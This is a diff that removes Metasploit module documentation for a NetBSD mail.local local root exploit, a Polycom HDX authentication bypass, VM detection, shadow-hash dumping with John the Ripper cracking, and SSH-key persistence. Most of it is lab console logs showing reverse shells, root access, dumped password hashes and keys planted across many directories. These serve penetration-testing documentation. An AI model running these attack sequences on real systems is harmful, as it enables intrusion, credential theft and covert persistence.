-msf exploit(netbsd_mail_local) > set verbose true
-verbose => true
-msf exploit(netbsd_mail_local) > set session 1
-session => 1
-msf exploit(netbsd_mail_local) > exploit
-[*] Started reverse double SSL handler on 172.16.152.1:4444 
-[*] Writing Payload to /tmp/pjDkvmGg
-[*] Max line length is 131073
-[*] Writing 176 bytes in 1 chunks of 618 bytes (octal-encoded), using printf
-[*] Writing exploit to /tmp/GHIKGOWX.c
-[*] Max line length is 131073
-[*] Writing 4898 bytes in 1 chunks of 17162 bytes (octal-encoded), using printf
-[*] Compiling /tmp/GHIKGOWX.c via gcc
-[*] Starting the payload handler...
-[*] Executing at 2016-08-25 19:59:04 -0400.  May take up to 10min for callback
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo X6C4UIDx4zmwM0DJ;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "X6C4UIDx4zmwM0DJ\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 2 opened (172.16.152.1:4444 -> 172.16.152.128:65532) at 2016-08-25 20:00:02 -0400
-[*] 2016-08-25 20:00:02 -0400
-[*] Remember to run: chown root:wheel /usr/libexec/atrun
-[+] Deleted /tmp/pjDkvmGg
-[!] This exploit may require manual cleanup of '/tmp/pjDkvmGg' on the target
-[!] This exploit may require manual cleanup of '/tmp/GHIKGOWX' on the target
-[!] This exploit may require manual cleanup of '/tmp/GHIKGOWX.out' on the target
-1633029467
-TkBWZEPqsRvYvmwNaTcjImhcSzZHOAtY
-true
-JUqfyioWthnpvyxRJAZosSGQjnLHqPUB
-sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr
-nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx
-whoami
-root
-```
@@ -1,36 +0,0 @@
-## Vulnerable Application
-
-This module exploits the Polycom HDX video endpoints with software <= 3.0.5.
-It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port
-23 should be accessible, as it is with the factory default configuration.
-
-## Verification Steps
-
-A successful check of the exploit will look like this:
-
-```
-msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
-msf exploit(psh_auth_bypass) > run
-
-[*] Started reverse double SSL handler on 192.168.1.120:4444
-[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
-[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
-[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo xInxktvgUmm7hPyh;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "xInxktvgUmm7hPyh\n"
-[*] Matching...
-[*] A is input...
-[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
-[*] 192.168.1.155:23 - Shutting down payload stager listener...
-
-whoami
-root
-uname -a
-Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
-```
@@ -1,130 +0,0 @@
-## Locations Checked
-
-There are many locations that are checked for having evidence of being a virtual machine.  The follow is a list of them:
-
-1. (with root access) `/usr/sbin/dmidecode`
-2. `/sbin/lsmod`
-3. `/proc/scsi/scsi`
-4. `cat /proc/ide/hd*/model`
-5. `lspci`
-6. `ls -1 /sys/bus`
-7. `lscpu`
-8. `dmesg`
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get a session via exploit of your choice
-  3. Do: `use post/linux/gather/checkvm`
-  4. Do: `set session <session>`
-  5. Do: `run`
-  6. You should get feedback if a virtual machine environment was detected
-
-## Options
-
-  **SESSION**
-
-  Which session to use, which can be viewed with `sessions -l`
-
-## Scenarios
-
-  Typical run against Kali with only one user (root), using ssh_login for initial shell
-
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:14:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/checkvm 
-msf post(checkvm) > set session 1
-session => 1
-msf post(checkvm) > run
-
-[*] Gathering System info ....
-[+] This appears to be a 'Xen' virtual machine
-[*] Post module execution completed
-  ```
-A non-virtual machine will have the following output
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:15:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/checkvm 
-msf post(checkvm) > set session 1
-session => 1
-msf post(checkvm) > run
-
-[*] Gathering System info ....
-[*] This does not appear to be a virtual machine
-[*] Post module execution completed
-  ```
-And a VMwave virtual machine
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:18:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/checkvm 
-msf post(checkvm) > set session 1
-session => 1
-msf post(checkvm) > run
-
-[*] Gathering System info ....
-[+] This appears to be a 'VMware' virtual machine
-[*] Post module execution completed
-```
@@ -1,98 +0,0 @@
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get a session via exploit of your choice
-  3. Do: `use post/linux/gather/hashdump`
-  4. Do: `set session <session>`
-  5. Do: `run`
-  6. You should see the contents of the shadow file
-
-## Options
-
-  **SESSION**
-
-  Which session to use, which can be viewed with `sessions -l`
-
-## Scenarios
-
-### Obtain Hashes
-
-  Typical run against Kali, using ssh_login for initial shell
-
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:12:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/hashdump 
-msf post(hashdump) > set session 1
-session => 1
-msf post(hashdump) > exploit
-
-[+] root:$6$eMImGFXb$3eYV4g315Qf2NA1aQ72yMwnM68PapXfCoP74kAb5vmQoqOz7sDTJQEMPUNNjZSEz.E4tXebqvt2iR3W50L8NX.:0:0:root:/root:/bin/bash
-[+] test:$6$gsSmzVTM$vxnEAvs2jEhuFtq0yzgCm.p49RmirvyI6HvPXgbLZCtg1sLp5Q2U82U6Gv6i5hz/pcsz882rnLRAyIL24h3/N.:1000:1000:test,,,:/home/test:/bin/bash
-[+] Unshadowed Password File: /root/.msf4/loot/20160914003144_default_127.0.0.1_linux.hashes_080983.txt
-[*] Post module execution completed
-  ```
-
-  This module only works when you are root or have root permisions.  If you only have user permission, expect feedback:
-
-  ```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username test
-username => test
-msf auxiliary(ssh_login) > set password test
-password => test
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'test:test' 'uid=1000(test) gid=1000(test) groups=1000(test) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:44823 -> 127.0.0.1:22) at 2016-09-14 00:24:17 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/hashdump
-msf post(hashdump) > set session 1
-session => 1
-msf post(hashdump) > exploit
-
-[-] You must run this module as root!
-[*] Post module execution completed
-  ```
-  ### Crack Hashes (John the Ripper)
-  
-The stored file can then have a password cracker used against it.  In this scenario, we'll use john (the ripper).
-```
-root@k:/git/metasploit-framework# john /root/.msf4/loot/20160914003144_default_127.0.0.1_linux.hashes_080983.txt
-Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
-Use the "--format=crypt" option to force loading these as that type instead
-Using default input encoding: UTF-8
-Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
-Press 'q' or Ctrl-C to abort, almost any other key for status
-test             (test)
-test             (root)
-2g 0:00:00:00 DONE 1/3 (2016-09-14 00:32) 40.00g/s 460.0p/s 480.0c/s 480.0C/s test..oo
-Use the "--show" option to display all of the cracked passwords reliably
-Session completed
-
-```
@@ -1,541 +0,0 @@
-### Creating A Testing Environment
-
-  This module has been tested against:
-
-1. Kali Rolling
-2. Ubuntu 16.04
-3. Centos 6
-4. Fedora 20
-5. FreeBSD 9
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  4. Do: `use post/linux/manage/sshkey_persistence`
-  5. Do: `set session #`
-  6. Optional Do: `set username`
-  7. Do: `set verbose true`
-  8. Optional Do: `Set sshd_config`
-  9. Do: `exploit`
-
-
-## Options
-
-  **sshd_config**
-
-  Location of the sshd_config file on the remote system.  We use this to determine if the authorized_keys file location has changed on the system.  If it hasn't, we default to .ssh/authorized_keys
-
-  **username**
-
-  If set, we only write our key to this user.  If not, we'll write to all users
-
-  **PubKey**
-
-  A public key to use.  If not provided, a pub/priv key pair is generated automatically
-
-## Scenarios
-
-### Ubuntu 16.04 (user level)
-
-Get initial access
-
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set user tiki
-    user => tiki
-    msf post(sshkey_persistence) > set CreateSSHFolder true
-    CreateSSHFolder => true
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added User SSH Path: /home/tiki/.ssh
-    [*] Attempting to create ssh folders that don't exist
-    [+] Storing new private key as /root/.msf4/loot/20160619095250_default_192.168.2.190_id_rsa_425588.txt
-    [*] Adding key to /home/tiki/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 761 bytes in 1 chunks of 2886 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.190
-    rhosts => 192.168.2.190
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username tiki
-    username => tiki
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.2.190:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 2 keys from /root/.msf4/loot
-    [+] SSH - Success: 'tiki:-----BEGIN RSA PRIVATE KEY-----
-    ...snip...
-    7m+il2AWyuPWOWEnpXRur3knruE2k97ObMH92FeI8SYaIThvqNUL
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 2 opened (192.168.2.229:42580 -> 192.168.2.190:22) at 2016-06-19 09:56:22 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-If you try to run for a user you don't have permissions for
-
-    msf post(sshkey_persistence) > exploit
-
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added: /root/.ssh
-    [*] Attempting to create ssh folders that don't exist
-    [+] /root/.ssh
-    [*] Creating /root/.ssh folder
-    [-] No users found with a .ssh directory
-    [*] Post module execution completed
-
-### CentOS 6 (user level)
-ssh keys must be enabled in sshd_config.
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username user
-    username => user
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.4.62
-    rhosts => 192.168.4.62
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'user:password' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:39289 -> 192.168.4.62:22) at 2016-06-19 15:27:27 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set user user
-    user => user
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added User SSH Path: /home/user/.ssh
-    [*] Attempting to create ssh folders that don't exist
-    [+] Storing new private key as /root/.msf4/loot/20160619152757_default_192.168.4.62_id_rsa_633695.txt
-    [*] Creating /home/user/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1447 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.4.62
-    rhosts => 192.168.4.62
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username user
-    username => user
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.4.62:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 6 keys from /root/.msf4/loot
-    [+] SSH - Success: 'user:-----BEGIN RSA PRIVATE KEY-----
-    MIIEpAIBAAKCAQEA8xtiDZrE6XgkOJaatg+TvUcrEr92/GDSZUtEqO9RvvvPO1Yt
-    ...snip...
-    Ubz5hiBypg1/C2TMB9jH3QLKmT66Te7rfym7rOBIgIJKivs5JLZe7w==
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 2 opened (192.168.2.229:34721 -> 192.168.4.62:22) at 2016-06-19 15:49:34 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-### CentOS 6 (root)
-The following sshd_config changes were made:
-
-    PubkeyAuthentication yes
-    AuthorizedKeysFile	.sshsecret/.authorized_keys
-    PermitRootLogin yes
-
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password pass
-    password => pass
-    msf auxiliary(ssh_login) > set rhosts 192.168.4.62
-    rhosts => 192.168.4.62
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'root:pass' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:46420 -> 192.168.4.62:22) at 2016-06-19 15:58:32 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key.  Keep in mind NOT setting a user (targeted), and CreateSSHFolder will possibly make MANY folders/files as can be observed below.
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set CreateSSHFolder true
-    CreateSSHFolder => true
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .sshsecret/.authorized_keys
-    [*] Finding .sshsecret directories
-    [*] Attempting to create ssh folders that don't exist
-    [*] Creating //.sshsecret folder
-    [*] Creating /bin/.sshsecret folder
-    [*] Creating /dev/.sshsecret folder
-    [*] Creating /etc/abrt/.sshsecret folder
-    [*] Creating /etc/ntp/.sshsecret folder
-    [*] Creating /proc/.sshsecret folder
-    [*] Creating /root/.sshsecret folder
-    [*] Creating /sbin/.sshsecret folder
-    [*] Creating /usr/games/.sshsecret folder
-    [*] Creating /var/adm/.sshsecret folder
-    [*] Creating /var/cache/rpcbind/.sshsecret folder
-    [*] Creating /var/empty/saslauth/.sshsecret folder
-    [*] Creating /var/empty/sshd/.sshsecret folder
-    [*] Creating /var/ftp/.sshsecret folder
-    [*] Creating /var/gopher/.sshsecret folder
-    [*] Creating /var/lib/avahi-autoipd/.sshsecret folder
-    [*] Creating /var/lib/gdm/.sshsecret folder
-    [*] Creating /var/lib/hsqldb/.sshsecret folder
-    [*] Creating /var/lib/mysql/.sshsecret folder
-    [*] Creating /var/lib/nfs/.sshsecret folder
-    [*] Creating /var/run/avahi-daemon/.sshsecret folder
-    [*] Creating /var/run/pulse/.sshsecret folder
-    [*] Creating /var/spool/lpd/.sshsecret folder
-    [*] Creating /var/spool/mail/.sshsecret folder
-    [*] Creating /var/spool/postfix/.sshsecret folder
-    [*] Creating /var/spool/uucp/.sshsecret folder
-    [*] Creating /var/www/.sshsecret folder
-    [+] Storing new private key as /root/.msf4/loot/20160619155920_default_192.168.4.62_id_rsa_271813.txt
-    [*] Creating //.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Creating /bin/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /dev/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /etc/abrt/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /etc/ntp/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Adding key to /home/user/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 761 bytes in 1 chunks of 2910 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /root/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /sbin/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /usr/games/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/adm/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/cache/rpcbind/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/empty/saslauth/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/empty/sshd/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/ftp/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/gopher/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/avahi-autoipd/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/gdm/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/hsqldb/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/mysql/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/nfs/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/run/avahi-daemon/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/run/pulse/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/lpd/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/mail/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/postfix/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/uucp/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/www/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Post module execution completed
-
-
-### FreeBSD9 (root)
-
-Several sshd_config mods were needed to allow root login, and enable the service to run correctly.
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.2.130
-    rhosts => 192.168.2.130
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'root:password' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64 '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:41724 -> 192.168.2.130:22) at 2016-06-19 22:10:59 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set username root
-    username => root
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Finding .ssh directories
-    [+] Storing new private key as /root/.msf4/loot/20160619221108_default_192.168.2.130_id_rsa_441694.txt
-    [*] Creating /root/.ssh/authorized_keys
-    [*] Max line length is 131073
-    [*] Writing 380 bytes in 1 chunks of 1461 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
